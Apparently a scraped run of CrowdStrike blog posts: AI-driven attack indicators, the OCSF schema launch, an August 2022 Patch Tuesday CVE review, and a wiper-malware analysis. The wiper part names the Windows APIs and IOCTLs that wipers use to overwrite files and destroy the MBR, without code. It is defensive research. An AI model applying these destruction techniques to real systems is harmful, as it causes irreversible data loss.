We’ve rigorously trained models to detect suspicious activity on enormous, expertly curated data sets of malicious threats and benign activities. Leveraging the power of the CrowdStrike Security Cloud to train these models on our cloud-native CrowdStrike Falcon platform, our machine learning models can synthesize enormous volumes of threat intelligence with unparalleled speed, scale and accuracy. By bringing the power of cloud-based ML to the process of developing IOAs, customers continue to benefit from the proactive, high-fidelity signals that IOAs provide, now with the speed and scale of the cloud.

Examples of AI-Powered IOAs 

Since going into production, our cloud ML models have conclusively identified over 20 new indicator patterns, which have been validated by experts and enforced on the Falcon platform for automated detection and prevention. Below we’ll examine two examples of adversary tactics we’ve detected, which resulted in new IOAs for post-exploitation payloads and PowerShell attacks. Over the next few months, we’ll continue to share examples of new classes of IOAs and how they help customers stay one step ahead of adversaries. 

Post-Exploitation Payload Detections 

Let’s start with the example of post-exploitation payloads. A post-exploitation payload is the code that an adversary transfers to a host once they have achieved initial access. These payloads vary and could be anything from a command-and-control beacon to a sophisticated ransomware threat. The AI-powered IOAs identify these by combining the output of our static Windows sensor AI model with how a file is run and with knowledge only available through the CrowdStrike Security Cloud. For example, we can include information on the process ancestry and the modalities of how the process was launched. With this additional data, we can achieve incredibly accurate detections and rich indicators, boosting accuracy beyond what is possible with either a static or behavioral approach alone. Known adversary groups we’ve tracked associated with these attack techniques include CARBON SPIDER, WIZARD SPIDER, PRIMITIVE BEAR and VENOMOUS BEAR. 

PowerShell IOAs Through the Eyes of AI

PowerShell is frequently leveraged by adversaries to deliver shellcode or tools like Mimikatz or execute malicious behaviors where an IOC will never be present on disk. These types of attacks are harder to identify, and traditional signature-based methods are easily bypassed with changes to the script or command line. 

Using the power of deep learning models to automatically extract the most relevant code sections from PowerShell scripts, we can identify and protect against PowerShell-driven fileless threats. This AI has been taught to “read” PowerShell scripts and understand the difference between legitimate and malicious code flows. It can understand encoded and obfuscated scripts faster and in ways human researchers cannot, enabling it to deliver proactive high-fidelity detection that is more difficult for adversaries to bypass. Known adversary groups that have used PowerShell to orchestrate attacks include CYBER SPIDER, OCEAN BUFFALO, HELIX KITTEN and STONE PANDA. 

Conclusion 

Machine learning remains a critical tool for detecting emerging patterns in data and conducting in-depth behavioral analysis to understand adversary intents and objectives. As a leader in cloud-delivered protection of endpoints, cloud workloads, identity and data, CrowdStrike is excited to keep harnessing the combined power of AI and the cloud to enhance defense, upend adversary tradecraft and help our customers stay one step ahead of adversaries to stop breaches.

Additional Resources 

CrowdStrike and Industry Partners Release Open Cybersecurity Schema Framework

10 August 2022 at 16:28

CrowdStrike is excited to announce the release of the Open Cybersecurity Schema Framework (OCSF) project, a collaborative open-source effort among cybersecurity and technology leaders to break down silos that impede cybersecurity teams’ abilities to quickly and effectively detect, investigate and stop breaches.

Detecting and stopping advanced cyberattacks demands coordination across multiple security tools and domains. Security teams too often exhaust time and resources normalizing data from disparate tools to perform the analysis and investigation needed to contain attacks. The OCSF project was developed to address this problem by making it simpler and less burdensome for organizations to use and exchange security data in the global fight against cybercrime.

The OCSF is an open-source standard designed for both data producers and consumers. It delivers a common and extensible, vendor-agnostic taxonomy to help security teams attain simpler and faster data ingestion and analysis without time-consuming data normalization. The goal for this initiative is to provide an open standard that can be adopted in any environment, application or solution provider while aligning with existing security standards and processes. In doing so, it can remove a long-standing obstacle that security teams face around the world. 

Similar to the Structured Threat Information eXpression (STIX) and Trusted Automated eXchange of Intelligence Information (TAXII) for threat intelligence, and the MITRE ATT&CK framework for tactic classification, OCSF simplifies threat detection and investigation for security teams. 

Innovating for the Future of Cybersecurity 

The OCSF project will benefit organizations in several ways; for example, in security analytics and extended detection and response (XDR) technologies. This coalition of industry partners supports unified data ingestion, enhanced detection and investigation across different domains.

Organizations don’t need more alerts — they need relevant insights across their security stack to detect and stop attacks. CrowdStrike already provides our customers with these insights through the Falcon platform, including Falcon XDR, which ingests data from across a broad range of third-party sources and correlates it with our industry-leading threat intelligence in the CrowdStrike Security Cloud. Falcon XDR applies CrowdStrike’s world-class machine learning, artificial intelligence (AI) and indicators of attack (IOAs) to extend endpoint detection and response (EDR) outcomes and advanced threat detection across the security stack.

CrowdStrike has also made great strides in helping our customers stop breaches through the CrowdXDR Alliance, which has brought together industry partners to establish a common XDR language for data sharing between security tools and processes. We see the Open Cybersecurity Schema Framework as a natural extension of the work we’ve been doing with leaders across the cybersecurity industry, and look forward to continuing our joint work on behalf of our customers. 

Industry Collaboration Drives Stronger Defense

CrowdStrike has always valued cybersecurity as a team sport. As an initial OCSF member, we continue this commitment as we collaborate with industry leaders to unburden security teams of the onerous work required to collect and normalize data before they can focus on analyzing it. 

This framework was conceived and initiated by AWS and Splunk, and derived from the Integrated Cyber Defense (ICD) schema work done at Symantec, a division of Broadcom, to unify all event formats. Along with CrowdStrike, the OCSF project now includes contributions and participation from 15 additional leading security organizations including Cloudflare, DTEX, IBM Security, IronNet, Okta, Rapid7, Salesforce, Securonix, Sumo Logic and Zscaler. Starting today, all members of the security community are welcome to use and contribute to the OCSF initiative.

This level of open-source collaboration is imperative as the cybersecurity market grows more crowded with vendors whose customers want to transfer data between tools and improve their efficacy. Organizations are actively consolidating vendors and integrating technologies, and survey data reveals this poses a challenge to security teams: cybersecurity professionals identified “numerous problems” in managing an assortment of security products from different vendors, ESG research shows

More than four out of five security professionals agree open source standards are a key requirement for future security technology interoperability, ESG’s data reveals. More than 75% of the 280 people surveyed would like to see greater industry support for open standards. Today’s release of the OCSF brings the security industry one step closer to achieving this goal. 

In keeping with the best practices of open-source efforts, the OCSF project is guided by a steering committee and managed as an open source software project under the Apache 2 license. It is not owned by any single organization; rather it is jointly managed by a team of maintainers in collaboration with project contributors. 

This effort would not have been possible without the many industry partners who came together to address a problem affecting organizations worldwide, and we are excited to be part of the OCSF initiative. Now that the news is out, we welcome more security teams and vendors to join and participate in the project. For more information on how to become part of the OCSF project, please visit https://github.com/ocsf/

Visit us at Black Hat 2022 in Last Vegas, Booth #1520 to learn more and have conversations with our experts on the show floor as they offer insights into protecting and enabling the people, processes and technologies that drive modern enterprise.

Additional Resources

  • Read the press release about OCSF
  • Find out more about how CrowdStrike supports U.S. federal initiatives at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21!  
  • View the Falcon XDR demo and learn more about Falcon XDR.
  • Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.
  • Get a free 15-day trial to check out CrowdStrike Falcon’s superior prevention from cyberattacks, malicious activity detection and immediate response capabilities for your business.

August 2022 Patch Tuesday: 17 Critical CVEs and Two Zero-Days, One Under Active Exploitation

11 August 2022 at 21:44

Microsoft has released 121 security patches for its August 2022 Patch Tuesday rollout. Seventeen vulnerabilities are rated Critical in severity and the rest are classified as Important, with one (CVE-2022-34713) under active exploitation. In this blog, the CrowdStrike Falcon Spotlight™ team analyzes this month’s vulnerabilities, highlights the most severe CVEs and recommends how to prioritize patching. 

August 2022 Risk Analysis

For the second month in a row, elevation of privilege continues to be the most commonly used attack type (53%), followed by remote code execution at about 25% and information disclosure at 10%. Elevation of privilege — used as an attack type in one of this month’s two zero-day vulnerabilities, both of which we analyze in detail below — is an easy attack type for even unsophisticated attackers to employ because many organizations often lack adequate security measures and controls. Rigorously enforcing the principle of least privilege, and knowing where the most sensitive company data is stored, is critical for creating a defensive security posture.

Figure 1. Breakdown of August 2022 Patch Tuesday attack types

Microsoft’s Windows product received the most patches this month including 45 Azure vulnerabilities — 34 of them affecting Azure Site Recovery Service, which also saw many CVEs patched in July 2022. CrowdStrike Falcon for Azure offers comprehensive visibility into Azure workload events, and virtual machine metadata enables detection, response, proactive threat hunting and investigation to help ensure nothing goes unseen in your cloud environments. 

This month, there are two zero-day vulnerabilities, one affecting Microsoft Exchange Server and the other impacting Microsoft Windows Support Diagnostic Tool (MSDT).

Figure 2. Breakdown of product families affected by August 2022 Patch Tuesday

Two Zero-Day Vulnerabilities Affect Microsoft Exchange Server and Microsoft Windows Support Diagnostic Tool (MSDT)

An actively exploited Microsoft Windows Support Diagnostic Tool (MSDT) remote code execution vulnerability known as “DogWalk” (CVE-2022-34713) now has an update. This CVE was first discovered in January 2020, however Microsoft did not classify it as a vulnerability at the time. However, when security researchers reported the zero-day remote code execution vulnerability called “Follina” (CVE-2022-30190) on May 27, 2022, it reignited the push to classify and fix the DogWalk vulnerability. As shown in Figure 3, this CVE is ranked as Important.

Rank CVSS Score CVE Description
Important 7.8 CVE-2022-34713 Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
Important 7.6 CVE-2022-30134 Microsoft Exchange Server Elevation of Privilege Vulnerability

Figure 3. Zero-day bugs patched this month

The second zero-day vulnerability, CVE-2022-30134, targets Microsoft Exchange Server. This CVE utilizes the information disclosure attack type, which allows an attacker to read targeted email messages. Figure 4 lists three Critical vulnerabilities affecting Microsoft Exchange Server that could allow an authenticated attacker to take over the mailboxes of all Exchange users. If utilized, an attacker could read and send emails or download attachments from any mailbox on Microsoft Exchange Server. In addition to patching, administrators will also need to enable Extended Protection to fully address these vulnerabilities.

Rank CVSS Score CVE Description
Critical 8 CVE-2022-21980 Microsoft Exchange Server Elevation of Privilege Vulnerability
Critical 8 CVE-2022-24477 Microsoft Exchange Server Elevation of Privilege Vulnerability
Critical 8 CVE-2022-24516 Microsoft Exchange Server Elevation of Privilege Vulnerability

Figure 4. Critical vulnerabilities affecting Microsoft Exchange Server

Critical Vulnerabilities in Windows PPP, SSTP and SMB

Two Critical Windows Point-to-Point Protocol (PPP) remote code execution vulnerabilities — both with a 9.8 CVSS score — and six Critical Windows Secure Socket Tunneling Protocol (SSTP) remote code execution vulnerabilities received patches this month. As you may know, these older protocols should be blocked at the perimeter and only be used if you absolutely need them. CVE-2022-35804, an SMB Client and Server remote code execution vulnerability, would allow a remote, unauthenticated attacker to execute code with elevated privileges on affected SMB servers. It should be noted that this bug affects Windows 11 only and could potentially be wormable between affected Windows 11 systems with SMB server enabled.

Rank CVSS Score CVE Description
Critical 9.8 CVE-2022-30133 Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability
Critical 9.8 CVE-2022-35744 Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability
Critical 8.8 CVE-2022-35804 SMB Client and Server Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-34702 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-34714 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-35745 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-35766 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-35767 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability
Critical 8.1 CVE-2022-35794 Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability

Figure 5. Critical vulnerabilities in Windows PPP, SSTP and SMB

Important Print Spooler and Windows Network File System Vulnerabilities

August 2022 is the fourth month in a row in which Microsoft is offering a patch for a Network File System (NFS) remote code execution vulnerability. CVE-2022-34715, a Windows NFS remote code execution vulnerability, is rated as Important and has been assigned a CVSS of 9.8. To exploit this vulnerability, a remote, unauthenticated attacker would need to make a specially crafted call to an affected NFS server, providing the threat actor with elevated privileges for code execution. While Microsoft lists this as Important in severity, CrowdStrike analysts recommend that this vulnerability be treated as Critical. Falcon Spotlight customers will receive a critical indicator so they can properly prioritize patching.

Rank CVSS Score CVE Description
Important 9.8 CVE-2022-34715 Windows Network File System Remote Code Execution Vulnerability
Important 7.3 CVE-2022-35755 Windows Print Spooler Elevation of Privilege Vulnerability
Important 7.3 CVE-2022-35793 Windows Print Spooler Elevation of Privilege Vulnerability

Figure 6. Important Print Spooler and Windows NFS vulnerabilities

CVE-2022-35755 and CVE-2022-35793 are elevation of privilege vulnerabilities located in Windows Print Spooler components, both rated as Important with a CVSS of 7.3. The first CVE can be exploited using a specially crafted input file, while exploitation of CVE-2022-35793 requires a user to click on a specially crafted URL. Both could potentially give the attacker SYSTEM privileges. These vulnerabilities can be mitigated by disabling the Print Spooler service, but CVE-2022-35793 can also be mitigated by disabling inbound remote printing via Group Policy.

Is It Time to Adjust Your Patching Strategy?

When it comes to maintaining your vulnerability management program, security hygiene and attack surface visibility can offer valuable data for informing how you prioritize and patch vulnerabilities within your environment. Adversaries are persistent and consistent, with the time and motivation to look for access in any way possible. Remember, a small amount of access is still access. 

Patch Tuesday is and will always be important to consider in your patching strategy. If any part of your environment uses Microsoft products, or if other vendors conduct patching cycles, it’s important to review the patches released every month and take time to apply fixes or updates to products wherever applicable.

Learn More

This video on Falcon Spotlight™ vulnerability management shows how you can quickly monitor and prioritize vulnerabilities within the systems and applications in your organization. 

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article

Additional Resources

  • Find out more about today’s adversaries and how to combat them at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21! 
  • See how Falcon Spotlight can help you discover and manage vulnerabilities in your environments. 
  • Read how CrowdStrike Asset Graph works in conjunction with Falcon Discover to offer you advanced insights on how suspicious activity is related to other assets within your environment. 
  • Learn how Falcon Identity Protection products can stop workforce identity threats faster. 
  • Download the CrowdStrike 2022 Global Threat Report to learn who and what is affecting your environment.
  • Make prioritization painless and efficient. Watch how Falcon Spotlight enables IT staff to improve visibility with custom filters and team dashboards
  • Test CrowdStrike next-gen AV for yourself with a free trial of Falcon Prevent™.

The Anatomy of Wiper Malware, Part 1: Common Techniques

This blog post is the first in a four-part series in which CrowdStrike’s Endpoint Protection Content Research Team will dive into various wipers discovered by the security community over the past 10 years. Our goal is to review in depth the various techniques employed by wipers that target the Windows operating system.

Background

A wiper is a type of malware with a single purpose: to erase user data beyond recoverability. Wipers are used to destroy computer networks in public or private companies ranging from industrial to entertainment sectors. Threat actors also use wipers to cover up traces left after an intrusion, weakening their victim’s ability to respond.

Wipers gained popularity back in 2012, when Saudi Arabia’s Saudi Aramco and Qatar’s RasGas oil companies were targeted by threat actors using the Shamoon family of wipers. After four years in which little to no wiper activity was observed, the Shamoon wiper resurfaced in 2016 with threat actors having the same goals and targets in mind. 

The year 2017 put multiple wiper families on our radar. A wiper variant of Petya was used to target multiple institutions in Ukraine, Russia and western Europe. Institutions in Israel and Germany faced the wipers named SQLShred and Ordinypt, respectively, which masqueraded as ransomware. Middle Eastern companies again found themselves the target of a wiper, this time one named StoneDrill.

Little wiper activity was observed in the following three years. In 2018, South Korea was the host of the Olympic games that were targeted by threat actors using Olympic Destroyer. In late 2019 and early 2020, Dustman and ZeroCleare were used to target organizations in the energy and industrial sectors from the Middle East. 

In 2021 threat actors again targeted the Olympics, now hosted in Tokyo, with a wiper named Tokyo Olympic Wiper. In the same year, a pro-Palestinian wiper dubbed IsraBye was used to target Israeli organizations.

Already, 2022 has been the most active year yet for wipers. Ukraine, while fighting Russian forces in traditional warfare, has seen its government institutions targeted by numerous cyberattacks using the wipers CaddyWiper, DoubleZero, DriveSlayer, IsaacWiper, KillDisk and WhisperGate.

Techniques

Over the years, threat actors have used different strategies to achieve their objectives. During that time, we’ve studied different adversary strategies that use wipers singularly or in combination with other destructive techniques. While quick and easy techniques can also have quick and easy countermeasures, the more advanced and lengthy ones may give victims a chance to react in time but usually not without difficulty. 

Ransomware and wipers share some techniques. Both walk the disk in search of files to modify or corrupt, and both are capable of making data recovery impossible for the victim. But in this latter aspect lies one of the biggest differences between the two threats: ransomware typically enables file restoration for victims who pay the ransom, whereas the objective of wipers is to destroy files beyond recoverability. Another difference is in performance; because wipers need not read the data from disk, they work faster and require fewer resources than ransomware.

One of the easiest techniques we’ve found in the analyzed wiper samples is to merely delete the files on disk. Yet this technique could allow forensics examiners to recover the files by carving them out from the raw disk. Because standard deletion is not a secure method, threat actors have resorted to overwriting target files with bogus data. To increase the speed of the operation, some wipers overwrite only the first part of the target file, while others resort to wiping the Master Boot Record (MBR). 

As we’ll discuss, these techniques vary in their unique advantages and weaknesses, as well as in the degrees of recoverability of destroyed data. Each of these techniques demands a different course of action to properly detect and respond to the various threats posed by destructive wiper malware families

File Discovery

In search of files to destroy or corrupt, most wipers recursively iterate through the file system by using Windows APIs like FindFirstFile and FindNextFile.

Figure 1. File iteration via FindFirstFile and FindNextFile APIs

While some wipers immediately overwrite their targets, Apostle, DoubleZero, SQLShred and WhisperGate construct a list of target files to be later processed by the wiping routine. This introduces a bit of overhead before the destructive functionalities are launched, buying the victim time to react.

Wipers are implemented to do as much damage as possible without crashing the operating system. During the file discovery operation, many wipers will implement different strategies to maintain the stability of the operating system. If critical files are overwritten, the machine will crash and the wiper may not achieve the desired outcome. In order to prolong the life of the machine, wipers can delay, skip or prioritize certain targets:

  • CaddyWiper, DoubleZero, IsaacWiper, SQLShred, and StoneDrill start the wiping routine with non-OS related drives (including mounted network shares) and directories
  • DoubleZero, CaddyWiper, KillDisk, SQLShred, and StoneDrill will skip certain directories (e.g., Windows, Program Files, ProgramData or others) from the wiper routine or delay their destruction at a later time of execution
  • KillDisk and WhisperGate skip certain file extensions like DLL, EXE, LIB, SYS
  • Ordinypt uses a list of targeted extensions similar to ransomware
  • CaddyWiper and SQLShred — if the configuration sets disk destruction — have been observed to first destroy target files and then destroy physical drives or disk volumes

File Overwrite

When it comes to overwriting files, wipers implement different techniques that achieve the same purpose. While some techniques are fairly common, others implement unique methods.

File System API

The standard method to overwrite a file is by using the CreateFile and WriteFile API combination. The first is used to grab a handle to the desired file and the second is used to overwrite the file contents with new data. This basic technique has been seen in multiple wiper families like CaddyWiper, DoubleZero, IsaacWiper, KillDisk, Meteor (including Stardust and Comet variants), Petya wiper, Shamoon, SQLShred, StoneDrill, and WhisperGate. Some wipers overwrite the entire file — a computationally costly operation — while others only overwrite a fixed number of bytes.

Figure 2. Determine file size, allocate memory and write to file

In Figure 2, Destover overwrites the entire file by determining its size via GetFileSize, allocates memory of the same size, excludes files based on their extension and overwrites the file using WriteFile

File IOCTL

While the previous method was the most common among the researched samples, DoubleZero implements a second mechanism for overwriting files. In order to overwrite the entire file with zeros, this wiper uses the NtFsControlFile API to send the FSCTL_SET_ZERO_DATA control code to the file system driver along with the size of the file to be overwritten.

Figure 3. DoubleZero uses FCSTL_SET_ZERO_DATA to overwrite file contents

File Deletion

When the operating system deletes a file from disk, the corresponding sectors are not overwritten with “null” data, they are only marked as unused. This indicates that the raw sectors are free to use when other files are created. Ordinypt, Olympic wiper and Apostle wipers implement simple file deletion, where files are only deleted, not overwritten. In this case, the data can still be recovered from the disk via file carving techniques used in digital forensics. To make the files unrecoverable, secure file deletion needs to be implemented and it requires the files to be overwritten before they are deleted from the disk. 

Most wipers do not need to delete the files because their contents have been destroyed, but some implement file deletion. This is the case of Destover, KillDisk, Meteor (Stardust/Comet), Shamoon, SQLShred, and StoneDrill which overwrite the target files with random bytes. Only after replacing the file contents, the file is deleted from disk via the DeleteFile API. 

The following code snippet displays an implementation of File Deletion and File Overwrite found in the Shamoon wiper.

Figure 4. How Shamoon wiper overwrites and deletes files

Although families like Apostle and Ordinypt do not implement a secure deletion, they are still considered destructive because file carving is not a perfect recovery technique.

Drive Destruction

Some wipers go one step further and attempt to destroy the contents of the disk itself, not just files. This approach provides several advantages to attackers and makes recovery more difficult, if not impossible. Because files may be fragmented across the disk, wiping the files will require the hard disk drive actuator arm to commute to multiple locations, thus decreasing wiping speeds. Overwriting the raw sectors in successive order is advantageous because it drastically increases the speed of the wiping operation. This also applies to modern solid state drives where sequential access is still more performant than random access. 

Wiping raw sectors also removes any file system information like partitioning tables, journaling, parity data, metadata and even OS protected files. These operations are equivalent to raw full-disk formatting, ensuring that files cannot be recovered via any forensic methods.

Disk Write

Similar to the way files can be overwritten, IsaacWiper, KillDisk, Petya wiper variant, SQLShred, StoneDrill, WhisperGate and DriveSlayer use the same CreateFile and WriteFile APIs to overwrite physical disks (\\.\PhysicalDisk0) and/or volumes (\\.\c:) with either random or predefined bytes buffers. “PhysicalDisk0” is used to access the first sector of a disk, where the Master Boot Record (MBR) is stored, while “\\.\C:” will allow the wiper to reference the first sector of the partition. 

Figure 5. Overwrite the MBR of the drive 0 via CreateFile and WriteFile APIs

The code snippet displays an implementation found in various wipers to delete the MBR by directly accessing the disk. The MBR is a structure that resides in the first sector of the disk and holds information about how the disk is formatted into one or multiple partitions. Deleting this structure removes information about the partitions making the system unbootable and also the files present in the partitions inaccessible.

Disk Drive IOCTL

Instead of using the WriteFile APIs for overwriting the physical disk, CaddyWiper wipes the disk by sending it a Input/Output Control (IOCTL) code. The IOCTL_DISK_SET_DRIVE_LAYOUT_EX IOCTL is sent via the DeviceIoControl API alongside a buffer filled with zeros in order to wipe information about drive partitions including MBR and/or GUID Partition Table (GPT). 

The code snippet below displays the implementation found in CaddyWiper.

Figure 6. Wipers corrupt the disk layout using IOCTL_DISK_SET_DRIVE_LAYOUT_EX

File Contents

As discussed previously, wipers may implement destructive actions on the contents of the file to reduce chances of recovery. We observed multiple approaches when deciding the data to be written over the target files. Some samples overwrite the files with the same data across the entire length, others randomize the contents, while others write predefined buffers to the target files.

Overwrite with Same Byte Value

A simple method is to write the same byte over the entire file contents. Wiper families like CaddyWiper, DoubleZero, KillDisk, Meteor (with its Stardust/Comet variants) and SQLShred implement this technique. 

This method does not add any overhead to the wiping process, but might leave an opportunity to recover the data via magnetic-force microscopy.

Overwrite with Random Bytes

To avoid any potential weakness of the previous method, threat actors can decide to generate random data to be used while overwriting files. Even some forensic tools implement secure wiping by overwriting the disk or file multiple times with random data, leaving no chance for magnetic-force microscopy to recover the data. 

Oftentimes the random buffer is generated via the seed and rand functions, followed by a write to the file. Generating random data adds overhead, thus lengthening the wiping times. Destover, IsaacWiper, KillDisk, SQLShred and StoneDrill are a few examples of wipers that overwrite target files with random data.

IsaacWiper implements its own pseudorandom number generator to fill a memory buffer, an implementation of Mersenne Twister PRNG.

Figure 7. Malloc is used to “generate random” bytes that will be written to the file

In Figure 6, Destover takes advantage of a caveat in the malloc function to generate “random” data. Malloc will allocate a memory buffer, but it will contain residual data from previous usage of that memory page that is then written over the entire length of the file.

Overwrite with Predefined Data

The final method to discuss is the use of hard coded data to overwrite files. This method eliminates the overhead introduced by generating random bytes, thus increasing the speed of data destruction. 

Shamoon overwrites files with a predefined jpeg image that is hardcoded and obfuscated in the wiper binary. It uses the WriteFile API to write the image; the header of the jpeg is seen in the memory view in the second half of the screenshot.

Figure 8. Debugger view, showcasing the JPEG image being written to a file

In contrast, the wiper IsraBye writes only a message to the file contents, and it does not overwrite every byte in the file content, leaving some data available for forensics analysts to extract. However, even though it is not as destructive as others, this wiper is able to overwrite the file header, reducing the possibility of data carving or recovery. 

Figure 9. IsraBye code snippet used to file overwrite and file rename

How the CrowdStrike Falcon Platform Protects Customers Against Wipers 

The CrowdStrike Falcon platform takes a layered approach to protect workloads. Using on-sensor and cloud-based machine learning, behavior-based detection using indicators of attack (IOAs), and intelligence related to tactics, techniques and procedures (TTPs) employed by threat actors, the Falcon platform equips users with visibility, threat detection, automated protection and continuous monitoring to rapidly detect and mitigate threats in any environment.

Figure 10. Falcon UI screenshot showcasing detection of Apostle by Falcon sensor.

Figure 11. Falcon UI screenshot showcasing detection of Ordinypt by Falcon sensor.

Summary

Depending on the skill set of different threat actors, wipers have implemented different techniques in order to sabotage the operations of their targets. Most often, wipers use file system specific APIs to iterate through files and overwrite and delete as many as possible. 

Some wipers don’t target only the files from the victim’s machine, but may also target the raw disk. This latter technique provides several advantages like increased wiping speeds for example. Also, it may bypass security measures implemented by the file system or operating system and may even be invisible to security products. 

To further increase the speed of the operations, some wipers do not overwrite the entire length of the target data, but only parts of it enough to make the files unrecoverable. To increase the destruction capability, randomizing the contents overwritten to the files seems like a good approach, but it becomes a time intensive task. An interesting and time efficient approach seen in some wipers is the usage of malloc to use garbage data to overwrite the target.

In part two of this wiper series, we will dive into how wipers use legitimate third-party drivers to destroy files as well as disk clusters.

Hashes

Wiper name SHA256 hash value
Apostle 6fb07a9855edc862e59145aed973de9d459a6f45f17a8e779b95d4c55502dcce

19dbed996b1a814658bef433bad62b03e5c59c2bf2351b793d1a5d4a5216d27e

CaddyWiper a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea
Destover e2ecec43da974db02f624ecadc94baf1d21fd1a5c4990c15863bb9929f781a0a
DoubleZero 3b2e708eaa4744c76a633391cf2c983f4a098b46436525619e5ea44e105355fe

30b3cbe8817ed75d8221059e4be35d5624bd6b5dc921d4991a7adc4c3eb5de4a

DriveSlayer 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da

1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591

a259e9b0acf375a8bef8dbc27a8a1996ee02a56889cba07ef58c49185ab033ec

Dustman f07b0c79a8c88a5760847226af277cf34ab5508394a58820db4db5a8d0340fc7
IsaacWiper 13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033

7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0

IsraBye 5a209e40e0659b40d3d20899c00757fa33dc00ddcac38a3c8df004ab9051de0d
KillDisk 8a81a1d0fae933862b51f63064069aa5af3854763f5edc29c997964de5e284e5

1a09b182c63207aa6988b064ec0ee811c173724c33cf6dfe36437427a5c23446

Meteor and Comet/Stardust 2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b

d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e

6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4

9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473

Ordinypt ​​085256b114079911b64f5826165f85a28a2a4ddc2ce0d935fa8545651ce5ab09
Petya 0f732bc1ed57a052fecd19ad98428eb8cc42e6a53af86d465b004994342a2366

fd67136d8138fb71c8e9677f75e8b02f6734d72f66b065fc609ae2b3180a1cbf

4c1dc737915d76b7ce579abddaba74ead6fdb5b519a1ea45308b8c49b950655c

Shamoon e2ecec43da974db02f624ecadc94baf1d21fd1a5c4990c15863bb9929f781a0a

c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a

7dad0b3b3b7dd72490d3f56f0a0b1403844bb05ce2499ef98a28684fbccc07b4

8e9681d9dbfb4c564c44e3315c8efb7f7d6919aa28fcf967750a03875e216c79

f9d94c5de86aa170384f1e2e71d95ec373536899cb7985633d3ecfdb67af0f72

4f02a9fcd2deb3936ede8ff009bd08662bdb1f365c0f4a78b3757a98c2f40400

SQLShred/Agrius 18c92f23b646eb85d67a890296000212091f930b1fe9e92033f123be3581a90f

e37bfad12d44a247ac99fdf30f5ac40a0448a097e36f3dbba532688b5678ad13

StoneDrill 62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260

2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83

bf79622491dc5d572b4cfb7feced055120138df94ffd2b48ca629bb0a77514cc

Tokyo Olympic wiper fb80dab592c5b2a1dcaaf69981c6d4ee7dbf6c1f25247e2ab648d4d0dc115a97

c58940e47f74769b425de431fd74357c8de0cf9f979d82d37cdcf42fcaaeac32

WhisperGate a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

44ffe353e01d6b894dc7ebe686791aa87fc9c7fd88535acc274f61c2cf74f5b8

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

ZeroCleare becb74a8a71a324c78625aa589e77631633d0f15af1473dfe34eca06e7ec6b86

Additional Resources

  • Find out more about today’s adversaries and how to combat them at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21! 
  • Learn how the powerful CrowdStrike Falcon platform provides comprehensive protection across your organization, workers and data, wherever they are located.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and see for yourself how true next-gen AV performs against today’s most sophisticated threats.
❌
❌